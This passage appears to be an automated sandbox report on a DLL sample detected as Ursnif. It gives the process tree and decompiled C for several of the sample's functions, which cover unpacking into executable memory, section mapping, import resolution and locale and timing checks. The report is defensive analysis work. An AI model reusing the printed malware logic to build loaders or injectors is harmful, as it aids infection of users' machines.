Start time:	03:04:03
Start date:	08/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\HP7cjYBnlS.dll',#1
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1288 Parent PID: 2160

General

Start time:	03:04:04
Start date:	08/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\HP7cjYBnlS.dll,Lastinch
Imagebase:	0x160000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5564 Parent PID: 5460

General

Start time:	03:04:04
Start date:	08/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\HP7cjYBnlS.dll',#1
Imagebase:	0x160000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.456094378.0000000005BB8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.456111628.0000000005BB8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.456029858.0000000005BB8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.456137723.0000000005BB8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.476067221.0000000005BB8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.456077100.0000000005BB8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.456001052.0000000005BB8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.456056228.0000000005BB8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.455955678.0000000005BB8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3508 Parent PID: 2160

General

Start time:	03:04:09
Start date:	08/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\HP7cjYBnlS.dll,Ownof
Imagebase:	0x160000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5936 Parent PID: 792

General

Start time:	03:05:23
Start date:	08/06/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff6c3cb0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2396 Parent PID: 5936

General

Start time:	03:05:24
Start date:	08/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5936 CREDAT:17410 /prefetch:2
Imagebase:	0x20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 2160 Parent PID: 5780 loaddll32.exeCOMMON

Executed Functions

Function 6E280A6A, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000006BB,00003000,00000040,000006BB,6E2804C0), ref: 6E280B27
VirtualAlloc.KERNEL32(00000000,00000304,00003000,00000040,6E280523), ref: 6E280B5E
VirtualAlloc.KERNEL32(00000000,0000EC47,00003000,00000040), ref: 6E280BBE
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E280BF4
VirtualProtect.KERNEL32(6E1B0000,00000000,00000004,6E280A49), ref: 6E280CF9
VirtualProtect.KERNEL32(6E1B0000,00001000,00000004,6E280A49), ref: 6E280D20
VirtualProtect.KERNEL32(00000000,?,00000002,6E280A49), ref: 6E280DED
VirtualProtect.KERNEL32(00000000,?,00000002,6E280A49,?), ref: 6E280E43
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E280E5F

Memory Dump Source

Source File: 00000001.00000002.474652266.000000006E280000.00000040.00020000.sdmp, Offset: 6E280000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 9e2c22e36acf44babe5495147b7aa9867cbdf17ed0ed428ecd2cc3310a4e75e3
Instruction ID: 09cd96681927d3f2610c6f18677cfd4fb1a082fbf3282f615a6ac4f1cbee3497
Opcode Fuzzy Hash: 9e2c22e36acf44babe5495147b7aa9867cbdf17ed0ed428ecd2cc3310a4e75e3
Instruction Fuzzy Hash: 0DD14676201301AFEB19CF98C880B5277A6FF4A710B1941D7ED0DAF69AE770AC15CB64

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1144, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E1B1144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E1B2210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e1b41d0;
				_push(_t15 + 0x6e1b505e);
				_push(_t15 + 0x6e1b5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E1B220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e1b41c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6e1b1144
0x6e1b114d
0x6e1b1151
0x6e1b1157
0x6e1b115c
0x6e1b1161
0x6e1b1164
0x6e1b1167
0x6e1b116c
0x6e1b116d
0x6e1b1170
0x6e1b117b
0x6e1b1182
0x6e1b1186
0x6e1b1188
0x6e1b1189
0x6e1b118c
0x6e1b1191
0x6e1b119b
0x6e1b119d
0x6e1b119d
0x6e1b11b1
0x6e1b11b7
0x6e1b11bb
0x6e1b120b
0x6e1b11bd
0x6e1b11c6
0x6e1b11dc
0x6e1b11e4
0x6e1b11f6
0x6e1b11fa
0x00000000
0x00000000
0x6e1b11e6
0x6e1b11e9
0x6e1b11ee
0x6e1b11f0
0x6e1b11f0
0x6e1b11d1
0x6e1b11d3
0x6e1b11fc
0x6e1b11fd
0x6e1b11fd
0x6e1b11c6
0x6e1b1213

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E1B1151
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1B1167
_snwprintf.NTDLL ref: 6E1B118C
CreateFileMappingW.KERNELBASE(000000FF,6E1B41C0,00000004,00000000,?,?), ref: 6E1B11B1
GetLastError.KERNEL32 ref: 6E1B11C8
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E1B11DC
GetLastError.KERNEL32 ref: 6E1B11F4
CloseHandle.KERNEL32(00000000), ref: 6E1B11FD
GetLastError.KERNEL32 ref: 6E1B1205

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 8c3ae0b61fcb96360bbc5cbe29503f6a38bb573991c1f5679a93f99da6274cf9
Instruction ID: f16de177cbcbcc63518270e8daf7be167a33cc236dd13572d32366f0fcd671ba
Opcode Fuzzy Hash: 8c3ae0b61fcb96360bbc5cbe29503f6a38bb573991c1f5679a93f99da6274cf9
Instruction Fuzzy Hash: FF21B672A00108BFDB00AFE9CC88EDE77BDEF59354F228165F911E7140D6705989EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1B9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1B1B9C(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E1B1EC7(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6e1b1ba5
0x6e1b1bac
0x6e1b1bad
0x6e1b1bae
0x6e1b1baf
0x6e1b1bb0
0x6e1b1bc1
0x6e1b1bc5
0x6e1b1bd9
0x6e1b1bdc
0x6e1b1bdf
0x6e1b1be6
0x6e1b1be9
0x6e1b1bf0
0x6e1b1bf3
0x6e1b1bf6
0x6e1b1bf9
0x6e1b1bfe
0x6e1b1c39
0x6e1b1c00
0x6e1b1c03
0x6e1b1c09
0x6e1b1c0e
0x6e1b1c12
0x6e1b1c30
0x6e1b1c14
0x6e1b1c1b
0x6e1b1c29
0x6e1b1c29
0x6e1b1c12
0x6e1b1c41

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 6E1B1BF9

Part of subcall function 6E1B1EC7: NtMapViewOfSection.NTDLL(00000000,000000FF,6E1B1C0E,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E1B1C0E,?), ref: 6E1B1EF4

memset.NTDLL ref: 6E1B1C1B

Strings

@, xrefs: 6E1B1BE9

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
Instruction ID: 863db97766832cbe8a952390313c30c43c172ab4524a9bb85752356c57d094c2
Opcode Fuzzy Hash: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
Instruction Fuzzy Hash: C6210BB1E0020DAFDB01CFE9C8849DEFBB9EB48354F514829E515F3210D7359A499B64

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1E8A, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E1B1E8A(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x6e1b1e8e
0x6e1b1e9f
0x6e1b1ea7
0x6e1b1ea9
0x6e1b1ebc
0x6e1b1ebc
0x6e1b1ec6

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6E1B1B27,?,6E1B1CE6,?,00000000,00000000,?,?,?,6E1B1CE6), ref: 6E1B1E9F
GetSystemDefaultUILanguage.KERNEL32(?,?,6E1B1B27,?,6E1B1CE6,?,00000000,00000000,?,?,?,6E1B1CE6), ref: 6E1B1EA9
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E1B1B27,?,6E1B1CE6,?,00000000,00000000,?,?,?,6E1B1CE6), ref: 6E1B1EBC

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: 6fa568ce1ae2d960a2c29312b24bedaca5dd5e853017eff4dd6194e125490050
Instruction ID: 4f26d0dac58748d071e4ac3dcfa88ebd82466edd71a8bf54ff40159eec67796c
Opcode Fuzzy Hash: 6fa568ce1ae2d960a2c29312b24bedaca5dd5e853017eff4dd6194e125490050
Instruction Fuzzy Hash: 06E04F64A40208F7EB00E7A18C0AFBE72BCAF0070AF504084FB01E60C0D7B49A09B769

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1F7C, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B1F7C(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e1b41cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6e1b1f7c
0x6e1b1f85
0x6e1b1f8a
0x6e1b1f90
0x6e1b1f99
0x6e1b1f9f
0x6e1b1fa1
0x6e1b1fa4
0x6e1b1fa9
0x6e1b1fb0
0x6e1b1fb0
0x6e1b1fb4
0x6e1b1fbc
0x6e1b1fbf
0x00000000
0x00000000
0x6e1b1fc5
0x6e1b1fcf
0x6e1b1fd1
0x6e1b1fd4
0x6e1b1fd7
0x6e1b1fdb
0x6e1b1fe3
0x6e1b1fe5
0x6e1b1fe8
0x6e1b2050
0x6e1b2050
0x6e1b2054
0x00000000
0x00000000
0x6e1b1fed
0x6e1b1ff3
0x6e1b1ff5
0x6e1b2008
0x6e1b200b
0x6e1b200b
0x6e1b200b
0x6e1b200f
0x6e1b1ff7
0x6e1b1ff7
0x6e1b1fff
0x6e1b2001
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1b2001
0x6e1b1fef
0x6e1b1fef
0x6e1b2003
0x6e1b2003
0x6e1b2003
0x6e1b2012
0x6e1b2015
0x6e1b2017
0x6e1b201e
0x6e1b2019
0x6e1b2019
0x6e1b2019
0x6e1b2026
0x6e1b202c
0x6e1b202e
0x6e1b205e
0x6e1b2030
0x6e1b2030
0x6e1b2033
0x6e1b2035
0x6e1b203d
0x6e1b203d
0x6e1b2042
0x6e1b2044
0x6e1b204b
0x6e1b204d
0x6e1b204d
0x6e1b204d
0x00000000
0x6e1b204d
0x00000000
0x6e1b202e
0x6e1b1fdd
0x6e1b1fdf
0x6e1b1fe1
0x00000000
0x00000000
0x6e1b1fe1
0x6e1b2061
0x6e1b2061
0x6e1b2068
0x6e1b206d
0x00000000
0x00000000
0x6e1b2073
0x6e1b207e
0x00000000
0x6e1b207e
0x6e1b2075
0x6e1b2075
0x6e1b207b
0x00000000
0x6e1b207b
0x6e1b1fa9
0x6e1b207f
0x6e1b2084

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1B1FB4
GetProcAddress.KERNEL32(?,00000000), ref: 6E1B2026

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: f767338727a8a7daad79d069826122b0c1744edd9b220410f08f7e1ab350d25e
Instruction ID: e47c213e717fb4b34e0efab48d1ea533ff07ccac836197f31bd04abfd4225dbe
Opcode Fuzzy Hash: f767338727a8a7daad79d069826122b0c1744edd9b220410f08f7e1ab350d25e
Instruction Fuzzy Hash: 3C313871E0020ADFEB50CF99C894AAEB7F4FF19300B25406EE815E7244E774DA89EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1EC7, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E1B1EC7(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6e1b1ed9
0x6e1b1edf
0x6e1b1eed
0x6e1b1ef4
0x6e1b1ef9
0x6e1b1eff
0x00000000
0x6e1b1f00
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,6E1B1C0E,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E1B1C0E,?), ref: 6E1B1EF4

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 4aa5af975c48ec949d3b8a3fae807b2f95267529b68938355746e16de5b9dd47
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 28F012B690420CBFEB119FA5CC85C9FBBBDEB44354B104939F552E1090D6309E4C9A60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1C7D, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E1B1C7D(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6E1B1F10();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E6E1B18AD(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6E1B1ADB(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6E1B13D1(E6E1B14E8,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6E1B134F(_t45,  &_v48) != 0) {
					 *0x6e1b41b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x6e1b41b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6E1B1B58(_t50 + _t15);
				 *0x6e1b41b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E6E1B142F(_t44);
					goto L11;
				}
			}

0x6e1b1c89
0x6e1b1c92
0x6e1b1c96
0x6e1b1d9e
0x6e1b1da4
0x00000000
0x00000000
0x00000000
0x6e1b1c9c
0x6e1b1c9c
0x6e1b1ca1
0x6e1b1ca7
0x6e1b1cb6
0x6e1b1cb7
0x6e1b1cba
0x6e1b1cbd
0x6e1b1cc6
0x6e1b1cca
0x6e1b1cd0
0x6e1b1cd4
0x6e1b1cdb
0x00000000
0x00000000
0x6e1b1ce1
0x6e1b1ce8
0x6e1b1cec
0x6e1b1d8f
0x6e1b1d8f
0x6e1b1d96
0x6e1b1d98
0x6e1b1d98
0x00000000
0x6e1b1d96
0x6e1b1cf5
0x6e1b1d48
0x6e1b1d48
0x6e1b1d59
0x6e1b1d5d
0x6e1b1d8b
0x6e1b1d5f
0x6e1b1d62
0x6e1b1d6a
0x6e1b1d6e
0x6e1b1d76
0x6e1b1d76
0x6e1b1d7d
0x6e1b1d7d
0x00000000
0x6e1b1d5d
0x6e1b1d03
0x6e1b1d42
0x00000000
0x6e1b1d42
0x6e1b1d05
0x6e1b1d09
0x6e1b1d12
0x6e1b1d14
0x6e1b1d18
0x6e1b1d3a
0x6e1b1d3a
0x00000000
0x6e1b1d3a
0x6e1b1d1a
0x6e1b1d1f
0x6e1b1d26
0x6e1b1d2b
0x00000000
0x6e1b1d2d
0x6e1b1d30
0x6e1b1d33
0x00000000
0x6e1b1d33

APIs

Part of subcall function 6E1B1F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1B1C8E,74B063F0,00000000), ref: 6E1B1F1F
Part of subcall function 6E1B1F10: GetVersion.KERNEL32 ref: 6E1B1F2E
Part of subcall function 6E1B1F10: GetCurrentProcessId.KERNEL32 ref: 6E1B1F3D
Part of subcall function 6E1B1F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1B1F56

GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 6E1B1CA1
SwitchToThread.KERNEL32 ref: 6E1B1CA7

Part of subcall function 6E1B18AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1B1903
Part of subcall function 6E1B18AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1B19C9

Sleep.KERNELBASE(00000000,00000000), ref: 6E1B1CCA
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1B1D12
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1B1D30
WaitForSingleObject.KERNEL32(00000000,000000FF,6E1B14E8,?,00000000), ref: 6E1B1D62
GetExitCodeThread.KERNEL32(00000000,?), ref: 6E1B1D76
CloseHandle.KERNEL32(00000000), ref: 6E1B1D7D
GetLastError.KERNEL32(6E1B14E8,?,00000000), ref: 6E1B1D85
GetLastError.KERNEL32 ref: 6E1B1D98

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

